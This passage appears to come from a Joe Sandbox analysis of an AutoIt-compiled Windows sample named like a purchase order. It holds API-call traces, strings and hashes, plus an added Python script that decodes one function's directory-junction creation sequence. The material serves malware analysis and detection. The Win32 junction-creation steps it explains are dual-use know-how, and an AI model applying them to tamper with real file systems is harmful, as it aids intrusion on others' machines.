• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0041EC44
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0041EC6F
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: fa767984c016168e11a07c472122d64acd6781c08bf6aa59bdba0659deab3c4c
• Instruction ID: dfbb39a5fd6f489b4dd909a84358be82f39fc6df2ca200e6644777d7fe3e063f
• Opcode Fuzzy Hash: fa767984c016168e11a07c472122d64acd6781c08bf6aa59bdba0659deab3c4c
• Instruction Fuzzy Hash: B9513C75A00709AFDB20DFA9CD89BAFBBF5FF04705F004929E546A26A0D7B4B944CB14
                                                                                                              APIs
                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 004379C6
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004379D1
                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 004379DC
                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 004379E7
                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 004379F2
                                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 004379FD
                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00437A08
                                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00437A13
                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00437A1E
                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00437A29
                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00437A34
                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00437A3F
                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00437A4A
                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00437A55
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00437A60
                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00437A6B
                                                                                                              • GetCursorInfo.USER32(?), ref: 00437A7B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Cursor$Load$Info
                                                                                                              • String ID:
                                                                                                              • API String ID: 2577412497-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003EC8B7,?,00002000,?,?,00000000,?,003E419E,?,?,?,0047DC00), ref: 003FE984
                                                                                                                • Part of subcall function 003E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003E53B1,?,?,003E61FF,?,00000000,00000001,00000000), ref: 003E662F
                                                                                                              • __wsplitpath.LIBCMT ref: 003EC93E
                                                                                                                • Part of subcall function 00401DFC: __wsplitpath_helper.LIBCMT ref: 00401E3C
                                                                                                              • _wcscpy.LIBCMT ref: 003EC953
                                                                                                              • _wcscat.LIBCMT ref: 003EC968
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 003EC978
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003ECABE
                                                                                                                • Part of subcall function 003EB337: _wcscpy.LIBCMT ref: 003EB36F
                                                                                                              Similarity
                                                                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                              • API String ID: 2258743419-1018226102
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 0044CEFB
                                                                                                              • DestroyWindow.USER32(?,?), ref: 0044CF73
                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0044CFF4
                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0044D016
                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044D025
                                                                                                              • DestroyWindow.USER32(?), ref: 0044D042
                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003E0000,00000000), ref: 0044D075
                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044D094
                                                                                                              • GetDesktopWindow.USER32 ref: 0044D0A9
                                                                                                              • GetWindowRect.USER32(00000000), ref: 0044D0B0
                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0044D0C2
                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0044D0DA
                                                                                                                • Part of subcall function 003FB526: GetWindowLongW.USER32(?,000000EB), ref: 003FB537
                                                                                                              Similarity
                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                              • String ID: 0$tooltips_class32
                                                                                                              • API String ID: 3877571568-3619404913
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0044F37A
                                                                                                                • Part of subcall function 0044D7DE: ClientToScreen.USER32(?,?), ref: 0044D807
                                                                                                                • Part of subcall function 0044D7DE: GetWindowRect.USER32(?,?), ref: 0044D87D
                                                                                                                • Part of subcall function 0044D7DE: PtInRect.USER32(?,?,0044ED5A), ref: 0044D88D
                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0044F3E3
                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0044F3EE
                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0044F411
                                                                                                              • _wcscat.LIBCMT ref: 0044F441
                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044F458
                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0044F471
                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0044F488
                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0044F4AA
                                                                                                              • DragFinish.SHELL32(?), ref: 0044F4B1
                                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0044F59C
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                              • API String ID: 169749273-3440237614
                                                                                                              APIs
                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0042AB3D
                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0042AB46
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042AB52
                                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0042AC40
                                                                                                              • __swprintf.LIBCMT ref: 0042AC70
                                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0042AC9C
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0042AD4D
                                                                                                              • SysFreeString.OLEAUT32(00000016), ref: 0042ADDF
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042AE35
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042AE44
                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0042AE80
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                              • API String ID: 3730832054-3931177956
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 004471FC
                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00447247
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                              • API String ID: 3974292440-4258414348
                                                                                                              APIs
                                                                                                              • EnumChildWindows.USER32(?,0041CF50), ref: 0041CE90
                                                                                                              Similarity
                                                                                                              • API ID: ChildEnumWindows
                                                                                                              • String ID: 4+I$CLASS$CLASSNN$H+I$INSTANCE$L+I$NAME$P+I$REGEXPCLASS$T+I$TEXT
                                                                                                              • API String ID: 3555792229-2131382867
                                                                                                              APIs
                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0044E5AB
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0044BEAF), ref: 0044E607
                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0044E647
                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0044E68C
                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0044E6C3
                                                                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0044BEAF), ref: 0044E6CF
                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0044E6DF
                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,0044BEAF), ref: 0044E6EE
                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0044E70B
                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0044E717
                                                                                                                • Part of subcall function 00400FA7: __wcsicmp_l.LIBCMT ref: 00401030
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                              • API String ID: 1212759294-1154884017
                                                                                                              • Opcode ID: 2be8b8da92e012aa4334d1434dd68b8a01d843507955817c32b22d21141ff903
                                                                                                              • Instruction ID: 8502aeee5e7db0b8b64092ab1ee88c9c9bb823709fb6a9e3b6f0bc8504986e97
                                                                                                              • Opcode Fuzzy Hash: 2be8b8da92e012aa4334d1434dd68b8a01d843507955817c32b22d21141ff903
                                                                                                              • Instruction Fuzzy Hash: 7C61B371A00215FAFB14DF65CC45FFE7BA8BB18714F104216F915E61D1EBB89980CB68
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0042D292
                                                                                                              • GetDriveTypeW.KERNEL32 ref: 0042D2DF
                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042D327
                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042D35E
                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042D38C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                              • API String ID: 1148790751-4113822522
                                                                                                              • Opcode ID: 244998578e6f3693e3ff6cddb1240c326c755da01095a1e8c39d33bb26cd7e38
                                                                                                              • Instruction ID: afe783d1fe841109f11efffa9f5993472a03eabedef6827176e51ffaaa3bd739
                                                                                                              • Opcode Fuzzy Hash: 244998578e6f3693e3ff6cddb1240c326c755da01095a1e8c39d33bb26cd7e38
                                                                                                              • Instruction Fuzzy Hash: 575179716043559FC701EF11C88196FB7E4EF98718F10896EF8866B2A1DB30EE06CB82
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00453973,00000016,0000138C,00000016,?,00000016,0047DDB4,00000000,?), ref: 004226F1
                                                                                                              • LoadStringW.USER32(00000000,?,00453973,00000016), ref: 004226FA
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00453973,00000016,0000138C,00000016,?,00000016,0047DDB4,00000000,?,00000016), ref: 0042271C
                                                                                                              • LoadStringW.USER32(00000000,?,00453973,00000016), ref: 0042271F
                                                                                                              • __swprintf.LIBCMT ref: 0042276F
                                                                                                              • __swprintf.LIBCMT ref: 00422780
                                                                                                              • _wprintf.LIBCMT ref: 00422829
                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00422840
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                              • API String ID: 618562835-2268648507
                                                                                                              • Opcode ID: aa5d643340c500d83c0de2fcb1b4dcaf0728698eb3ce13cf6c7b0375c1f0c052
                                                                                                              • Instruction ID: 27e4e9898080a5e960f4063b016f81a35966ef309ed5820a2afe29fa7f73871c
                                                                                                              • Opcode Fuzzy Hash: aa5d643340c500d83c0de2fcb1b4dcaf0728698eb3ce13cf6c7b0375c1f0c052
                                                                                                              • Instruction Fuzzy Hash: 5E418272900169BACF11FBD1DE82EEEB778AF15344F500166F5017A0D2EAB86F09CB65
                                                                                                              APIs
                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0042D0D8
                                                                                                              • __swprintf.LIBCMT ref: 0042D0FA
                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0042D137
                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0042D15C
                                                                                                              • _memset.LIBCMT ref: 0042D17B
                                                                                                              • _wcsncpy.LIBCMT ref: 0042D1B7
                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0042D1EC
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0042D1F7
                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0042D200
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0042D20A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                              • String ID: :$\$\??\%s
                                                                                                              • API String ID: 2733774712-3457252023
                                                                                                              • Opcode ID: dd55688670d336e97ddad78c9fe2fa97504b45a89dcad4b97289cf974ed21353
                                                                                                              • Instruction ID: 61b48e87465bb93920ad3224b565bc9de6e4a4ace3b7434c13e0aa51cb1227bf
                                                                                                              • Opcode Fuzzy Hash: dd55688670d336e97ddad78c9fe2fa97504b45a89dcad4b97289cf974ed21353
                                                                                                              • Instruction Fuzzy Hash: 6631B372E00119ABDB20DFA1DC48FEB77BCAF89701F5040BAF509D21A0E77496448B39
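The function at 0042D0D8..0042D20A above creates a directory, opens it with dwFlagsAndAttributes 02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT), formats the target with the `\??\%s` string and issues DeviceIoControl code 000900A4, which is FSCTL_SET_REPARSE_POINT; the RemoveDirectoryW between the two CloseHandle calls is consistent with a cleanup path taken when the IOCTL fails. That is the standard Win32 sequence for turning a fresh directory into a junction (mount point), and it is easier to spot when the listing is decoded mechanically. The following is an added example, not code from the Joe Sandbox report, from the sample or from AutoIt: a small parser for the bullet lines above that resolves the hex arguments of CreateFileW and DeviceIoControl to their Windows SDK names and flags the junction-creation pattern. The input is constructed by copying the listing verbatim, the constant values come from winnt.h and winioctl.h, and the `is_reparse_point_creation` heuristic and its name are assumptions of this example.

```python
"""Decode a Joe Sandbox function API listing into named Win32 calls.

Added example, not code from the Joe Sandbox report, the sample or AutoIt. The
input is the bullet list printed for the function at 0042D0D8..0042D20A; the
constant values are those of the Windows SDK headers (winnt.h, winioctl.h).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the API lines of this function, copied from the report.
LISTING = """\
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0042D0D8
• __swprintf.LIBCMT ref: 0042D0FA
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0042D137
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0042D15C
• _memset.LIBCMT ref: 0042D17B
• _wcsncpy.LIBCMT ref: 0042D1B7
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0042D1EC
• CloseHandle.KERNEL32(00000000), ref: 0042D1F7
• RemoveDirectoryW.KERNEL32(?), ref: 0042D200
• CloseHandle.KERNEL32(00000000), ref: 0042D20A
"""

# "• Api.MODULE(arg,arg,...), ref: ADDR" or "• _crtfunc.LIBCMT ref: ADDR" (no args).
LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# winnt.h / fileapi.h values
GENERIC_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
CREATE_FILE_FLAGS = [(0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
                     (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"),
                     (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"),
                     (0x40000000, "FILE_FLAG_OVERLAPPED"),
                     (0x00000080, "FILE_ATTRIBUTE_NORMAL")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
# winioctl.h: CTL_CODE(FILE_DEVICE_FILE_SYSTEM=9, fn, METHOD_BUFFERED, access)
FSCTL_NAMES = {0x000900A4: "FSCTL_SET_REPARSE_POINT",
               0x000900A8: "FSCTL_GET_REPARSE_POINT",
               0x000900AC: "FSCTL_DELETE_REPARSE_POINT"}
IOCTL_METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]  # None where the plugin printed '?'
    ref: int


def parse_listing(text: str) -> List[Call]:
    """Turn the bullet lines into Call records; lines that do not match are skipped."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args"):
            for tok in m.group("args").split(","):
                tok = tok.strip()
                args.append(None if tok == "?" else int(tok, 16))
        calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_flags(value: int, table) -> List[str]:
    """Names of the bits set in value; bits not covered by the table stay as hex."""
    names = [name for bit, name in table if (value & bit) == bit]
    leftover = value & ~sum(bit for bit, _ in table) & 0xFFFFFFFF
    if leftover:
        names.append(hex(leftover))
    return names


def decode_ioctl(code: int) -> Dict[str, object]:
    """Split a CTL_CODE into device<<16 | access<<14 | function<<2 | method."""
    return {"device": code >> 16, "access": (code >> 14) & 3,
            "function": (code >> 2) & 0xFFF, "method": IOCTL_METHODS[code & 3],
            "name": FSCTL_NAMES.get(code, "unknown")}


def describe(call: Call) -> Dict[str, object]:
    """Resolve the recorded arguments of CreateFileW and DeviceIoControl to SDK names."""
    if call.api == "CreateFileW" and len(call.args) >= 7:
        return {"api": call.api,
                "access": decode_flags(call.args[1] or 0, GENERIC_ACCESS),
                "disposition": DISPOSITION.get(call.args[4], "?"),
                "flags": decode_flags(call.args[5] or 0, CREATE_FILE_FLAGS)}
    if call.api == "DeviceIoControl" and len(call.args) >= 2 and call.args[1] is not None:
        return {"api": call.api, "ioctl": decode_ioctl(call.args[1])}
    return {"api": call.api}


def is_reparse_point_creation(calls: List[Call]) -> bool:
    """Heuristic (assumption of this example): CreateDirectoryW, then CreateFileW
    with FILE_FLAG_OPEN_REPARSE_POINT, then FSCTL_SET_REPARSE_POINT, in that order."""
    stage = 0
    for c in calls:
        if stage == 0 and c.api == "CreateDirectoryW":
            stage = 1
        elif (stage == 1 and c.api == "CreateFileW" and len(c.args) >= 6
              and c.args[5] is not None and c.args[5] & 0x00200000):
            stage = 2
        elif (stage == 2 and c.api == "DeviceIoControl" and len(c.args) >= 2
              and c.args[1] == 0x000900A4):
            return True
    return False


if __name__ == "__main__":
    parsed = parse_listing(LISTING)
    for c in parsed:
        print(f"{c.ref:08X} {describe(c)}")
    print("junction creation pattern:", is_reparse_point_creation(parsed))
```

The parser only understands the one-line bullet form; the indented "Part of subcall function" lines are deliberately left unmatched so that calls made from a callee are not mixed into the caller's sequence. The same approach extends to the other listings on this page (for example decoding the 80000000 access mask of the CreateFileW at 0044E754 as GENERIC_READ), but the heuristic only fires for the reparse-point sequence.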
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0044BEF4,?,?), ref: 0044E754
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E76B
                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E776
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E783
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0044E78C
                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E79B
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0044E7A4
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E7AB
                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E7BC
                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0046D9BC,?), ref: 0044E7D5
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0044E7E5
                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0044E809
                                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0044E834
                                                                                                              • DeleteObject.GDI32(00000000), ref: 0044E85C
                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0044E872
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                              • String ID:
                                                                                                              • API String ID: 3840717409-0
                                                                                                              • Opcode ID: 5648cd123b6cf0bc5d8271540e8ef3631217bff9daa9a699863eda787529b5e7
                                                                                                              • Instruction ID: 83c7dcee33d1bcd591d6ca1e2546794a1c32be013b9411d6d514ee72abc5f878
                                                                                                              • Opcode Fuzzy Hash: 5648cd123b6cf0bc5d8271540e8ef3631217bff9daa9a699863eda787529b5e7
                                                                                                              • Instruction Fuzzy Hash: 8D414975A00204EFDB119F66CC48EAB7BB8FF89725F104069F906D72A0E7749D41CB25
                                                                                                              APIs
                                                                                                              • __wsplitpath.LIBCMT ref: 0043076F
                                                                                                              • _wcscat.LIBCMT ref: 00430787
                                                                                                              • _wcscat.LIBCMT ref: 00430799
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004307AE
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004307C2
                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 004307DA
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004307F4
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00430806
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
